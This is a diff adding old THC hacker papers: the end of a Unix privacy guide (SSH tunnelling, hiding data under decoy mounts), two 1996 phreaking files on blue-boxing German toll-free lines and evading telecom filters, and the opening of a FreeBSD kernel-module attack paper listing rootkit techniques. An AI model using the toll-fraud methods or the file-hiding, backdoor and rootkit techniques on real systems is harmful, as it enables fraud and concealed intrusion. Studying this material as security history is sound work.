+- Msmtp,          P=[IPC], F=mDFMuX, S=11/31, R=21, E=\r\n, L=990,
++ Msmtp,          P=[IPC], F=mDFMuXk, S=11/31, R=21, E=\r\n, L=990,
+</pre>
+(add the "k" switch to the smtp option config line)
+<br>
+<br>
+
+
+~user/.fetchmailrc:
+<pre>        poll localhost protocol POP3:
+            user USER_REMOTE with pass PASSWORD_REMOTE is USER_LOCAL here
+            mda "/usr/sbin/sendmail -oem USER_LOCAL"
+</pre>
+(enter the corresponding USER_* and PASSWORD in here)
+<br>
+<br>
+
+The ssh commandline which tunnels the traffic for POP3, SMTP and irc:
+<pre>        ssh -a -f -x -L 110:localhost:110 -L 6667:irc.server.com:6667 -L \
+            25:localhost:25 your_mail_server.com
+</pre>
+<br>
+<br>
+
+That's all. I won't tell you more. Use your brain ;-)
+<br>
+<br>
+<br>
+<br>
+
+
+
+<A NAME="8"></A>
+<bold>* VIII. HIDING PRIVACY SETTINGS</bold>
+<A NAME="81"></A>
+<bold>*** 1. Mount is your friend</bold>
+<br>
+<br>
+
+Take a look at the following commands:
+<pre># ls -l /home
+total 3
+drwxr-x---   1 root     root         1024 Mar 28 14:53 admin
+drwxr-x---   1 vh       thc          1024 Mar 28 16:22 vh
+drwxr-x---   1 user     users        1024 Mar 28 11:22 user
+# mount -t ext2 /dev/hda11 /home      # or a ramdisk, doesn't matter
+# ls -l /home
+total 0
+# : whoops, where are the homedirs ?
+# umount /home
+# ls -al /home
+total 3
+drwxr-x---   1 root     root         1024 Mar 28 14:53 admin
+drwxr-x---   1 vh       thc          1024 Mar 28 16:22 vh
+drwxr-x---   1 user     users        1024 Mar 28 11:22 user
+# : ah, yeah there they are again ...
+</pre>
+
+This is a nice feature to hide your crypted data and binaries.
+Just put your files into e.g. /usr/local/bin and /usr/local/crypt
+and mount a decoy filesystem over /usr/local. If you then have got
+a process started in your boot scripts which opens a file on the decoy
+filesystem, the filesystem can't be unmounted until the process is killed.
+This way, it's much harder for someone to detect your data!
+<br>
+<br>
+<br>
+
+
+<A NAME="82"></A>
+<bold>*** 2. Removable Medias</bold>
+<br>
+<br>
+
+An even better possibility is: put all your sensitive data on a removable
+media. Put your media in, mount it, it run the startscript from it
+to activate all the privacy stuff. This way you made it one step harder
+for someone to get to know whats going on.
+<br>
+<br>
+
+
+<A NAME="83"></A>
+<bold>*** 3. ???</bold>
+<br>
+<br>
+
+Any other ideas? Think about it! (and maybe send me your ideas ;-)
+<br>
+<br>
+<br>
+<br>
+
+
+
+<A NAME="9"></A>
+<bold>* IX.   EXAMPLE CONFIGURATION AND SCRIPTS</bold>
+<br>
+<br>
+<a href="anonymous-unix-0.9.tar.gz">Click here</a> to download the
+<bold>anonymous-unix-0.9.tar.gz</bold> tools!
+<br>
+<br>
+<br>
+<br>
+
+
+
+<A NAME="10"></A>
+<bold>* X.   FINAL COMMENTS</bold>
+<br>
+<A NAME="101"></A>
+<bold>*** 1. Where to get the tools mentioned in this text</bold>
+<br>
+<br>
+
+- Crypto Filesystems
+<ul>
+ CFS (Cryptographic File System)  <a href="http://www.replay.com">http://www.replay.com</a><br>
+ TCFS (Transparent CFS)           <a href="ftp://mikonos.dia.unisa.it/pub/tcfs">ftp://mikonos.dia.unisa.it/pub/tcfs/</a><br>
+ SFS (Stegano File System)        <a href="http://www.linux-security.org/sfs">http://www.linux-security.org/sfs</a><br>
+ Crypto Loopback Filesystem       <a href="ftp://ftp.csua.berkeley.edu/pub/cypherpunks/filesystems/linux/">ftp://ftp.csua.berkeley.edu/pub/cypherpunks/filesystems/linux/</a><br>
+</ul>
+
+- Tools
+<ul>
+ THC's secure_delete package      <a href="http://www.thc.org">http://www.thc.org</a><br>
+ secure-linux kernel patch        <a href="http://www.false.com/security">http://www.false.com/security</a><br>
+ syslog-ng                        <a href="http://www.balabit.hu/products/syslog-ng.htm">http://www.balabit.hu/products/syslog-ng.htm</a><br>
+ ssylog                           <a href="http://www.core-sdi.com/ssyslog">http://www.core-sdi.com/ssyslog</a><br>
+</ul>
+
+- The example Linux Distribution
+<ul>
+ SuSE Linux Distribution          <a href="http://www.suse.com">http://www.suse.com</a><br>
+</ul>
+<br>
+
+<A NAME="102"></A>
+<bold>*** 2. Additional thoughts</bold>
+<br>
+<br>
+
+The following problems are still present:
+<ul>
+    - If an attacker can gain access to the system without rebooting
+      and in time before data is wiped, unmounted, etc. these countermeasures
+      are worthless.</ul>
+<ul>
+    - If a really well funded organisation is trying to decrypt your
+      data via brute force/dictionary or good electronic microscopes
+      and technical staff with excellent knowhow, your wiping won't
+      help you very much.</ul>
+<ul>
+    - The solution for /var/spool/mail and /var/spool/mqueue etc. is far
+      away from being perfect. Remember this. Ideas welcome.</ul>
+<ul>
+    - The configuration of your system daemons can only be secured if
+      you are present at the console after a reboot. That's the price.</ul>
+<ul>
+    - It is not very hard to detect the privacy stuff done. This might
+      bring you in trouble in countries like China or Iran. Removable
+      medias might help, or try a crypto filesystem with stegano support.</ul>
+<br>
+
+Secure your system against unauthorized (from your point of view) access
+and use strong passwords.
+<br>
+<br>
+<br>
+
+
+<A NAME="103"></A>
+<bold>*** 3. Greetings (what would the world be without greets?)</bold>
+<br>
+<br>
+
+What would the world be without love and greetings? ;-)
+<br>
+<br>
+
+Greets to individuals (in alphabetic order):
+<ul>
+       Doc Holiday, Froody, Fyodor, plasmoid, pragmatic, rookie,
+       Solar Designer, Tick, Wilkins.</ul>
+<br>
+
+Greets to groups:
+<ul>       ADM, THC (of course ;-) and arF</ul>
+<br>
+
+Greets to channel members:
+<ul>       #bluebox, #hack, #hax, #!adm and #ccc</ul>
+
+<br>
+<br>
+
+<A NAME="104"></A>
+<bold>*** 4. How to contact me for updates or comments</bold>
+<br>
+<br>
+
+Please send me any further ideas you've got to make this documentation
+better! Did I wrote bad bad english in some part? Could I rephrase parts
+to make it easier to understand? What is wrong? What's missing? <a
+href="mailto:vh@reptile.rug.ac.be>Email me!</a>
+<br>
+Tell me (best with a corrected diff) and I'll update this text.
+<br>
+<br>
+
+<br>
+Please use my public pgp key below.
+<br>
+<br>
+<br>
+
+
+Ciao...
+<br><ul>
+<a href="mailto:vh@reptile.rug.ac.be">van Hauser / THC - [The Hacker's Choice]</a>
+</ul><br>
+<br>
+
+
+THC's Webpage -&gt; <a href="http://www.thc.org">http://www.thc.org</a>
+<br>
+(or <a href="http://thc.pimmel.com">http://thc.pimmel.com</a> or <a href="http://www.thc.org">http://www.thc.org</a>)
+<br>
+
+<PRE>
+
+Type Bits/KeyID    Date       User ID
+pub  2048/CDD6A571 1998/04/27 van Hauser / THC &lt;vh@reptile.rug.ac.be&gt;
+
+-----BEGIN PGP PUBLIC KEY BLOCK-----
+Version: 2.6.3i
+
+mQENAzVE0A4AAAEIAOzKPhKBDFDyeTvMKQ1xx6781tEdIYgrkrsUEL6VoJ8H8CIU
+SeXDuCVu3JlMKITD6nPMFJ/DT0iKHgnHUZGdCQEk/b1YHUYOcig1DPGsg3WeTX7L
+XL1M4DwqDvPz5QUQ+U+VHuNOUzgxfcjhHsjJj2qorVZ/T5x4k3U960CMJ11eOVNC
+meD/+c6a2FfLZJG0sJ/kIZ9HUkY/dvXDInOJaalQc1mYjkvfcPsSzas4ddiXiDyc
+QcKX+HAXIdmT7bjq5+JS6yspnBvIZC55tB7ci2axTjwpkdzJBZIkCoBlWsDXNwyq
+s70Lo3H9dcaNt4ubz5OMVIvJHFMCEtIGS83WpXEABRG0J3ZhbiBIYXVzZXIgLyBU
+SEMgPHZoQHJlcHRpbGUucnVnLmFjLmJlPokAlQMFEDVE0D7Kb9wCOxiMfQEBvpAD
+/3UCDgJs1CNg/zpLhRuUBlYsZ1kimb9cbB/ufL1I4lYM5WMyw+YfGN0p02oY4pVn
+CQN6ca5OsqeXHWfn7LxBT3lXEPCckd+vb9LPPCzuDPS/zYnOkUXgUQdPo69B04dl
+C9C1YXcZjplYso2q3NYnuc0lu7WVD0qT52snNUDkd19ciQEVAwUQNUTQDhLSBkvN
+1qVxAQGRTwgA05OmurXHVByFcvDaBRMhX6pKbTiVKh8HdJa8IdvuqHOcYFZ2L+xZ
+PAQy2WCqeakvss9Xn9I28/PQZ+6TmqWUmG0qgxe5MwkaXWxszKwRsQ8hH+bcppsZ
+2/Q3BxSfPege4PPwFWsajnymsnmhdVvvrt69grzJDm+iMK0WR33+RvtgjUj+i22X
+lpt5hLHufDatQzukMu4R84M1tbGnUCNF0wICrU4U503yCA4DT/1eMoDXI0BQXmM/
+Ygk9bO2Icy+lw1WPodrWmg4TJhdIgxuYlNLIu6TyqDYxjA/c525cBbdqwoE+YvUI
+o7CN/bJN0bKg1Y/BMTHEK3mpRLLWxVMRYw==
+=MdzX
+-----END PGP PUBLIC KEY BLOCK-----
+</PRE>
+</BODY>
+</HTML>

Papers/bb-ger.txt

@@ -0,0 +1,352 @@
+                                                               January 1996
+
+       BB in Germany
+       written by Dr. Fraud
+
+
+Hi Phreaks !
+
+In this article, I wanna write a little bit about BB in Germany. This phile 
+is NOT a `how 2 do it' essay....   It`s 4 phreaks to show what has done and 
+what is still possible. I also  won`t describe any signalling  systems like 
+C5/R2/C7, cause everyone  who reads this phile should know how they work. I 
+have put the TXT into several groups like the following:
+
+  - Overview: breakable countries
+  - Why are other countrys not breakable ?
+  - The story `bout C4
+  - You don`t get a busy flash....ahahaha!
+  - How the TELECOM filters work
+  - About Hardware
+  - Problems with Transit/Routings
+  - How 2 get Routing Codes 
+  
+
+
+  1.) Overview: the breakable countries
+
+  At the 1st point, I wanna give you a short list of the easy breakable 
+  countrys. As u can see, there are many ones u can break, but most of them 
+  are not very interesting (seen in the aspect of getting out of those 
+  fucking desert-countries....). The only exception are the C5/R2 countries. 
+  but at the moment, there are only very few people who can phreak them... 
+  congratulations !
+  Okay, here are the breakable ones (alphabetical order)
+
+   > Argentinia (+54)
+   > Brasilia (+55)
+   > Chile (+56)
+   > China (+86)
+   > Columbia (+57)
+   > Emmirates of Arabia (+971)
+   > Guatemala (+502)
+   > Hawaii (+1-808)
+   > Indonesia (+62) [not available from everywhere]
+   > Iceland (+354)
+   > Japan (+81)  !! hard 2 seize !! 
+   > Jordania (+962) !! still offline !!
+   > Macau (+853)
+   > Malaysia (+60) [not any more !]
+   > Nicaragua (+505)
+   > Paraguay (+595)
+   > Phillipines (+63)
+   > Singapore (+65)
+   > South Africa (+27)
+   > Uruguay (+589)
+   > Venezuela (+58)
+
+  At 1st, I wanted to add the frequs for each country....no, not exactly, but
+  at least a description like: Cl.Fwd/EOf/Seize. But I decided that its not
+  very useful because you should be able to find them out by yourself. Besi-
+  des, all these ones are C5 and quite simple 2 break (more or less.... arghh 
+  I hate the Phillipines !!!!!!). U can reach them via HCD (standard) with 
+  the exception of HawaII.
+  NOTE: These are not all the existing countrys you can reach by a toll free
+        number... but these ones are the easiest to call. If you wan`t to
+        call other countries by direct (=local) breaking, start scanning !
+                     
+ * Concerning the Thailand HCD (+66), I`m not sure what is is, but I think it
+   should be C7. If not and if you can break it, please contact me ! 
+
+ * At MCI and AT&T, I already had sume argues with other phreaks, but I know
+   that at least AT&T _IS_ breakable ! [note: or WAS breakable until 12/95]
+
+The problem with R2 is that it`s mostly PCM (in Germany). This means that
+there`s used a multiplex system to mix information and signalling signals.
+So you use 1 channel each, but it seems as if you are just on one channel.
+At the moment, I still don`t cope with those systems... Sumetimes, I get a
+Hgup, but I don`t know whether it`s caused from my BB or from that fuCkiNg
+switch.
+Another problem is: theres no absolute standard on R2. It depends on the area
+you live in and the country u wanna break 2 get a success. Just start scan-
+ning... Some hints: Of course, u should only scan the effective signalling 
+band....it would be quite senseless to scan from 500 up to 1500 Hz. And al-
+ways remember: R2 is not an international system. It`s always combined with 
+at least one signalling frequency of another system (like C5) !
+
+
+
+
+
+
+
+
+2.) Why are other countries not breakable ?
+
+    aaaahahahhah!!! stupid question. Cause they changed to C7.
+
+    Anyway, there is a possible exception: The "Fiiieep" linez. If you are not
+    from Germany, you can`t imagine what this means to the phreaker: You know,
+    some switches (e.g. the Siemens-Alcatel) require an exact timing. The Cl.
+    Fwd. must be sent on exact the time when you can hear the 2nd "click" (or 
+    some milliseconds after). There is one problem now: The Telco has changed 
+    that click to a noisy "fiiieek" now on some nuMbAs. That noise is inter-
+    modulating the break you send. The result is: No result. 
+    The only thing you can do: (except when you live in area 03....ggrrr...I 
+    hate everyone in there...) increase the volume of your break to a maximum
+    and try to find a guard tone that fixes that interference...this should be
+    not too easy.... after some minutes of experimenting, you may be able to
+    achieve a HgUp, but seizing will be quite complicated !
+
+
+
+
+
+
+
+
+3.) Phunny story bout C4
+
+Just a few words 2 the phreaks who wanna start scanning C4 lines,
+inspired by the Scavenger dialer: Yes, u can call via C4 lines, if u
+a) break an oversea line (e.g. Germany => Paraguay...aaeh..no...Paraguay uses
+   R2 at the country itself...)
+b) call a C4 based numba in that country, break it and have phun...
+But there are 2 major problems:
+a) linez are shit
+b) there are nearly (I said nearly, in fact, I don`t know _ANY_) no C4 linez
+   left... perhaps, u will find someones in South America or Africa.
+
+So, forget the C4 shit and concentrate to the future... and future is defini-
+tively NOT C4 !
+
+
+
+
+
+
+
+3.) U don`t get a Busy Flash.... ahahhahahahaha!!
+
+If you are unable to recieve a Busy Flash, then you`ve got a problem: the
+TELEKOM filters. These phunny devices are sitting in the toll-free oversea
+trunk groups just for one purpose: Killing the Clear Forward and the Seize
+signal to avoid line manipulation. In my area, there were 2 different kinds
+of filters:
+The first ones were just inverters, which lowered or highered the specific
+signals sent in the line. This means, that a 2400/2600 tone will be recogni-
+zed from the switch as, e.g., a 2350/2650 signal... This means that you can
+easily pass those filters when sending e.g. a 2450/2550 tone. This is, of 
+course, not a very effective protection !
+At the next step, a more complicated system was installed: a Schmitt-Trigger
+system, combined with a selective switch. I will explain later how it works
+exactly.
+At this time, just remember: It`s IMPOSSIBLE 2 install any protection that
+will avoid inband line manipulation 100% . There`s always a way to pass it !
+
+
+
+
+
+
+
+4.) How the telecom filters work:
+
+The function of those devices is quite simple: the filters are put in the 
+line subscriber ----> german switch. This (should) avoid a line manipulation
+from the side of the subscriber`s line.
+The filter consists of a simple notch filter that blocks the 2400 signal if
+the installed frequency counter counts the critical frequs.
+The bandwidth is all over the tolerance of the frequency used for inter-
+national trunks. This is achived by a strong damping of the circuit. Just
+find an international exchange and let it give you a nice echo. Then, start
+scanning and draw a function of the filtered tones. U should draw that func-
+tion in dependence of the frequency and the volume.
+The tricky thing is the following: the filters are "normally" not enabled.
+They are only activated when recieving a signal that is in tolerance of their
+setting. The control of "enabled"-"not enabled" is taken by a simple Schmitt-
+Trigger circuit. Just watch sume electronic-book for further information.
+To activate the Trigger, a tone of a certain frequency _and_ a certain length
+must be recieved (Trigger-Level).
+So: when u add a third tone to your Cl.Fwd., there is obtained an inter-
+modulation: the volume increases and decreases in the same frequency as the
+guard tone. So, u just need to find the correct guard tone(s), and u will be
+able to pass the filter.
+Sometimes, its a little bit more tricky: If this method doesnt work, just use
+some fuzzy tones (mix the tones with colored noise). This changes the wave-
+form from sinus to something un-definable. That sort of signal is much harder
+to trigger (if you`ve got an oscillograph, u can see it quite good). So, the
+chances of "confusing" the trigger are much better....
+Finally, there`s a third method: Just create a trunk that you play _before_
+the "real" trunk....the more tones, the better ! I use the nice TLO444 and
+wrote a tiny script that will do this job quite good...it has `bout 20 tones,
+played with 3 or 4 frequencys each. If you set the right frequs (TIP: use the
+frequs near the signalling area, add a DHLS sumetimes, play a 2000 Hz and so
+on). If you have done it right, that filter will be "confused" (you can com-
+pare it with drinking 10 beers and going to bed immediately) and it can get 
+passed much easier.
+
+
+
+
+
+
+
+5.) About Hardware
+
+It`s always useful to have some hardware that can support you while whistling
+around....the good old walkman-headphones are fine for checking out a line
+you can break not yet, but it`s not possible to get a 100% great result. Just 
+call your favourite HPA board and leech the schematic of a standard BlueBox.
+I use a more comfortable method. This has two reasons:
+1.) When using a transformator that is connected to the phone line directly, 
+    your ears will be bloody after a hole night of scanning
+2.) Connecting the soundcard in another way will offer you much more comfort.
+
+If you`ve got some idea about electronics, connect the output of your computer 
+to the microphone in the telefone. The ECM-Micros work best. Normally, it`s 
+necessary to limit the signal with a resistor of about 50K. And if you want to 
+record the line, connect the mic. input to the speaker of your phone. Depen-
+ding on your circuit, it may be useful to add a small capacitator (.1uF). This 
+offers a much better quality and the tones sent out of the speaker while brea-
+king are much more calm. This allows you to listen better to any reaction of 
+the line. And if you`ve already done that piece of work, then you can make a
+device that allows you to hang up the line and release it again automatically.
+I built a switch that is controlled by the tones sent out of my dialer. I just
+reserved a frequency (ca. 3900 Hz) and adjusted that phunny device to exactly 
+that value. So, if I send a 3900 Hz tone, my line hangs up automatically and 
+releases again after a free-definable time. If you are interested in that
+device, just contact me !
+Also phunny is a circuit that can decode the special-info sequence (you know,
+that tuuu-tuuuu-tuuuuu you recieve when calling a not-existing number). I 
+don`t know whether this is also possible by a powerful realtime-software; but
+when connecting that circuit to the parallel port, you may increase the rate
+of success while scanning to the maximum. When using that device, you needn`t
+sitting in front of your screen anymore... you just wait for a "success-beep"
+from the computer when getting a number that does not result in the special-
+info-tone. The only condition for this is a well-programmed software.
+
+Another phunny toy is an oscilloscope, because:
+- You look so cool when sitting in front of it, dialing, phreaking, pushing
+  all the buttons at the scope (and only you know what they are good for) and
+  watching the great waves appearing on the screen when getting a connect ...
+- Hmmm..and, besides, an oscilloscope is EXTREMLY useful to find out every-
+  thing that has to do with waveform, amplitude and delay of the signal sent
+  in the line, and, more important, coming out of it. E.g., you can search a
+  number, kill the exchange, sending a signal which will give you an echo and
+  start analysing the behavior of the switch.
+
+The last point about hardware: A device that can send a variable (coloured)
+noise into the line. A very simple noise generator is an old radio. Just put 
+it on AM and search an area with a good, strong noise. By turning the knob in
+any direction, the sound of the noise should change a little bit. To find the
+best position, set your dialer to a 60s Cl.Fwd. and mix it with the noise ob-
+tained by the reciever. Believe it or not, it works !
+BTW : Yes, I know, the Scavenger dialer has this feature, too. But the noise  
+      routine seems to be a little buggy...besides, it`s much easier to use
+      a little hardware, because you can find out the correct setting very
+      fast just by turning a knob is any direction. The only thing you`ve got
+      to do is to connect the speaker of the radio (or, in other words, the 
+      two wires leading to the speaker) with the phone line using direct 
+      connection or transformator. A 50K resistor prevents the noise from get-
+      ting too loud. Just play a little bit for optimal results.
+
+
+
+
+
+
+
+6.) Problems with Transit/Routings
+
+some years ago, finding out a routing or using transit was no problem (I say
+this not out of my own experience; I`m not doing BB as long that I can con-
+firm this....but I was told so).
+Now, things have changed a little bit. The old standard of using <KP2>-CC-DD
+is working only to some boring countries with boring lines. The "good" coun-
+tries (like HK/USA etc.) are extremely well protected now. But in spite of
+that, you can still get a success if you have a free afternoon and some luck.
+For exemple, the toll free lines of some countries can sometimes be called
+from an international exchange. To give you an exemple:
+
+ a) you call the HCD of a country that has <KP2> disabled
+ b) you break it
+ c) after breaking, you call the Op. of another country (e.g.: A02-800-XXX)
+ d) you wait for the "chick" and break the line country --> next country
+ e) perhaps this country you are in now has <KP2> open ....
+
+The disadvantage of this is that you MUST set your trunk very exactly. If your
+break for the 2nd country is in tolerance of the switch of the 1st country, 
+your line kicks off...hahaha....try it again.
+Perhaps, you find a country that is breakable with 2400 and 2600 Hz, sent
+seperately. On HawaII, you will remark that you can send the tones seperately.
+If you`ve found a Transit or a Route, you can try to find a gate in the
+following way [just for exemple !!!]:
+  a) You can do transit via XXXXXX to russia
+  b) You want to call YYYYYY
+  c) Just dial <KP2>7-00-YYY-nuMbA<ST>
+
+The success of this method depends on the "transit power" of the country you
+can do transit to. Perhaps you can try it out by calling directly.
+
+Another way of calling is to change the exchange you are in by sending a 
+loooong signalling tone....the more experienced phreaks will know what I mean
+when talking about this..... This method only works on quite old switches.
+
+
+
+
+
+
+7.) How 2 get Routing Codes
+
+At the beginnig of this article, I wanted to tell you how to find out which
+country offers which routes to kall out. With this method it`s not often 
+possible to get the routes directly, but you will know whether it`s senseful
+to start scanning around.
+But now I decided not to tell you that possibility, because it wont work any-
+more if too many people use it. BTW, forget the old trick with <KP2>-2F-<ST>
+The operators are still incredibly stupid, but they won`t give out their
+Operator routes to someone who says: "....Hi, lines are busy,...please gimme
+your routing for calling Canada...".
+
+
+
+
+
+
+
+Okay, thats it....I think that you knowed most of the things I told, but per-
+haps you found a little hint that may be useful for you. Have a nice life !
+
+
+
+                                                      Greetz,
+                                                              Dr. Fraud
+
+
+
+
+
+
+
+
+
+
+
+
+
+P.S.: This article didn`t grow out of my free volunteer....
+      I was forced to write it....hahaa...    ...and remember: J.F.K. is dead !
+<yeah and i'll do it again for the next mag hehehehe! [vH]>
+

Papers/bb-plan.txt

@@ -0,0 +1,103 @@
+
+ A SELECTIVE SWITCH FOR GETTING MORE COMFORTABLE SCANNING
+                                                          written by Dr. Fraud
+
+ HI PHREAKS,
+
+ In thiz short article, I will show you an easy possibility to get a more com-
+ fortable way to make BB-calls and scannings. Most of you use one of the fol-
+ lowing ways to call:
+
+   1.) U pick up the handset of the phone; you get a dialtone. Then, you dial
+       the number you wish to call. If BOXING fails, you hang up and try it
+       again...
+   2.) U send a "HIGH" to yout LPT port. This causes a little circuit to open
+       the line. You get a dial tone...and you dial....
+
+ Of course, both of these methods are pretty nice...but here`s a better way to
+ get control over your line status:
+ Its possible to control the line with a little switch that always "listens"
+ to your soundcard`s output; if that switch recieves a tone of a certain fre-
+ quency (and you can tell the circuit what frequency this should be), it pro-
+ duces a "HIGH". This can be used to open/close a relais.
+
+ NOTE: There's a blueprint picturefile with this article, called BB-PLAN.GIF !
+
+
+ Question: Why do I need that circuit ?
+ Answer  : Simple. Cause it`s comfortable and easy to use. Okay... before I
+           tell you more of that question/answer rubbish, you should take a
+           look on that phunny plan in that tiny GIF-picture. (BB-PLAN.GIF)
+           First, here are the materials you need to build up the switch:
+
+           C1= 2,2 uF
+           C2= 47  nF
+           C3= 100 nF
+           C4= 10  nF
+           P = 20  K
+           D = common diod, as e.g. 1N 914
+           IC= 567 (LM 567, NE 567 etc.)  ...costs `bout 1$/piece...
+
+ You can build this thing any way you want... there are no critical values
+ you must pay attention for. Here are some electrical data:
+
+    - supply range:              4,75V to 9V
+    - supply current typ:        7 mA
+    - Input resistance:          20K
+    - smallest detectable input: 20mV (!)
+    - highest centre frequency:  500 KHz (!)
+
+ As you can see, the electrical data allow an universal use of that switch.
+ The resonance-frequency is defined as follows: Fo=1/(P*C4)
+ The band-width is the following: B= sqr(Ue/Fo*C4)  ! NOTE: Depends on Ue !
+ It`s adjustable from 1% up to more than 10%. This means, that, if you adjust
+ it to 1%, a 1000 Hz tone will only be recognized from 990 Hz up to 1010 Hz.
+ If you use 10%, you will be able to send 900 Hz up to 1100 Hz to get a
+ response from the switch.
+
+ Question: How Do I use that phunny switch ?
+ Answer  : Simple. Just connect it via a relais (ca. 5V) to your phone line.
+           The output voltage (pin 4+8) should be used to control the "prima-
+           ry" side.
+ Question: And then ?
+ Answer  : Then you only have to move the trimmer until the relays "clicks"
+           when you send the frequency you want. Some dialers (e.g., the
+           latest SCAVENGER dialer) support that. If you wanna get off-hook
+           and on-hook again in an easy way, just connect that device to your
+           soundcard/phone line (Ue) and you will have a great utility to get
+           a phree line within about 2 seconds just by pressing a stupid little
+           key. The relais will stay open as long as that tone is recieved.
+          
+
+ Note for practical use: If you decide to use that system, you should pay at-
+ tention to the following advices:
+
+ 1.) The value of P depends on the frequency you wanna use. It`s useful to use
+     (haha...nice english) a frequency that is above the "normal" signalling
+     frequency (e.g. 3900 Hz.) 
+ 2.) Depending on that value, the value of the poti can vary... just look for 
+     a good frequency, get the correct value and use the correct resistor for
+     the poti. Sometimes, it`s more than 20K.
+ 3.) Avoid interferences. If you don`t, (e.g. you send a 3000/3001 Hz signal),
+     the behavior of the switch will get unstable. In fact, this can be also
+     quite useful (Analyst, u know...), but normally, it`s senseless.
+ 4.) Block your output. Sometimes, you connect your soundcard`s output with
+     any devices without checking whether they are potential-free. This means,
+     that if you connect your soundcard to the phone-line _and_ to that switch,
+     you may get a problem `cause your signal is not potential-free. Avoid that
+     while using a simple transformator. It costs about 2$ and really prevents
+     your computer from getting unexpected noise/voltage/damage.
+
+Okay... if you still don`t know the use of my tiny switch, then you are:
+
+    1.) stupid
+    2.) lame
+    4.) stupid & lame
+
+Hmm...check it out... if you`ve got any problems, just contact me at L.O.R.E.
+BBS at any time !
+
+Greetz,
+        Dr. Fraud
+
+

Papers/bsdkern.html

@@ -0,0 +1,4486 @@
+<HTML>
+<TITLE>- Attacking FreeBSD with Kernel Modules -</title>
+<BODY BGCOLOR=WHITE>
+<CENTER>
+<H1><FONT COLOR=#0000FF>
+                - Attacking FreeBSD with Kernel Modules -
+</H1></FONT>
+
+
+<H4>
+    The System Call Approach  
+</H4>
+
+</CENTER>
+<P>
+<H4><FONT COLOR=#FF0000>
+written by pragmatic / THC, version 1.0<br>
+released 06/1999<br>               
+</H4></font>
+
+
+
+<P><P><P><P><P><P>
+
+<CENTER>
+<H3>
+                                    CONTENTS
+</H3>
+</CENTER>
+                 
+                
+                     
+
+<A HREF="#Introduction"> Introduction</A><BR>
+<p>
+<b>
+<A HREF="#I.">I.Basics</A><BR>
+</b>
+<A HREF="#I.1.">1. FreeBSD 'Modules' - 'Hello World' Syscall Example</A><BR>
+<A HREF="#I.2.">2. Link Files and Modules - the difference </A><BR>
+<A HREF="#I.2.1.">2.1 A two in one example</A><BR>
+<A HREF="#I.3.">3. Diary of a module load process from the kernel
+perspective</A><BR> 
+<A HREF="#I.4.">4. Other kinds of modules</A><BR>
+<A HREF="#I.5.">5. MISC modules with the KLD scheme</A><BR>
+<A HREF="#I.6.">6. System calls on FreeBSD</A><BR>
+<A HREF="#I.6.1.">  6.1 Important system calls for hacking</A><BR>
+<A HREF="#I.7.">7. Important Kernel structures / lists</A><BR>
+<A HREF="#I.7.1.">  7.1 TheSeeker - or how to access kernel lists</A><BR>
+<A HREF="#I.8.">8. From User to kernel space and back</A><BR>
+<A HREF="#I.9.">9. Last Words</A><BR>
+<p>
+<p>
+<b>
+<A HREF="#II.">II. Attacking with kernel code</A><BR>
+</b>
+<A HREF="#II.1.">1. How to intercept Syscalls</A><BR>
+<A HREF="#II.2.">2. Filesystem related hacks</A><BR>
+<A HREF="#II.2.1.">2.1 How to hide files</A><BR>
+<A HREF="#II.2.2.">2.2 How to hide the file contents</A><BR>
+<A HREF="#II.2.3.">2.3 And the rest ?</A><BR>
+<A HREF="#II.3.">3. Process related hacks</A><BR>
+<A HREF="#II.3.1.">3.1 How to hide any process</A><BR>
+<A HREF="#II.3.2.">3.2 backdoor 'rootshell'</A><BR>
+<A HREF="#II.4.">4. file execution redirection</A><BR>
+<A HREF="#II.5.">5. TTY hijacking</A><BR>
+<A HREF="#II.6.">6. Hiding the module</A><BR>
+<A HREF="#II.7.">7. Last words</A><BR>
+<p>
+<p>
+<b>
+<A HREF="#III.">III. Securing the kernel</A><BR>
+</b>
+<A HREF="#III.1.">1. How to detect sysent[] modifications</A><BR>
+<A HREF="#III.2.">2. How to restore old system calls</A><BR>
+<A HREF="#III.3.">3. General ideas for using MD5 Hashes</A><BR>
+<A HREF="#III.4.">4. How to see a hidden process</A><BR>
+<p>
+<p>
+<b>
+<A HREF="#IV.">IV. Last things to mention</A><BR>
+</b>
+<A HREF="#IV.1.">1. What about OpenBSD and NetBSD</A><BR>
+<A HREF="#IV.2.">2. Links</A><BR>
+<A HREF="#IV.3.">3. Greetings</A><BR>
+
+
+<p>
+<H3><A NAME="Introduction"></A>Introduction</H3>
+<p>
+FreeBSD is an often used server operating system. Lots of ISPs, universities
+and some firms are using it. After releasing my Linux LKM text van Hauser asked
+my to take a look at the FreeBSD kernel, so here we go.<br>
+This text will show you that most Linux LKMs can be ported to BSD systems
+(FreeBSD). On FreeBSD we can even do some things that were harder to
+implement on Linux systems. This text only deals with ways to
+backdoor/intercept system calls. I had a little conversation with Solar
+Designer who tought me that there are lots of other ways to attack the FreeBSD
+kernel, but this will come in a further release.<br>
+For those people new to BSD and module techniques I really suggest reading my
+'(nearly) Complete Linux Loadable Kernel Module' article
+(http://www.thc.org). Of course this FreeBSD text has a basic section, but
+the basic part of the Linux text is much more comprehensive  and easier to
+understand. The Linux text will give you the basic ideas for understanding
+most stuff I mention here. People who already did some kernel coding under
+FreeBSD, who can read and understand kernel code and those who did some LKM
+hacking on Linux boxes can read on without any problems. Bear in mind that the
+main aim of this text is to show some new ideas to attack/backdoor FreeBSD
+systems, and not to teach you FreeBSD kernel coding. So I made it as short and
+complete as I can. I developed all modules on a FreeBSD 3.1 system (x86). I
+used the new KLD scheme - introduced by FreeBSD 3.0 - to insert kernel code.
+Older FreeBSD systems which work with LKMs (/dev/lkm) can also be used, but
+there must be some modifications to the code in order to make them work. The
+general ideas in this text should also work on OpenBSD and NetBSD.  For kernel
+gurus : Don't blame me for the bad coding style I used in this paper
+sometimes, but very compact code is harder to understand,to read  and even
+harder to explain. And please remember : This text is for educational purpose
+only !<br>
+ Note : I only know of one text dealing with the problems and solutions
+I describe here. That older text written by halflife (see Phrack Magazine  
+Volume 7, Issue 51 September 01, 1997, article 09) showed how to hide LKMs
+under FreeBSD 2.2 systems and how to hide certain files from directory
+listings (the goal was to avoid integrity checks). Due to the fact that you
+can do much more stuff with modules and that FreeBSD changed a lot (LKMs are
+gone...) I wrote this text.
+
+<p>
+<H3><A NAME="I."></A>I. Basics</H3>
+<p>
+This section will give you a very brief and easy (so partly incomplete) but
+working overview of the FreeBSD way to insert code via modules. <br>
+The problem concerning FreeBSD is the lack of documentation. There is only a
+very small and elite group of programmers working on the kernel. At the time
+of writing (May '99) I was not able to find any
+good documentation helping us to dive deep into the kernel. So we have to go
+the hardest but best way : reading source code. Because of this there may be
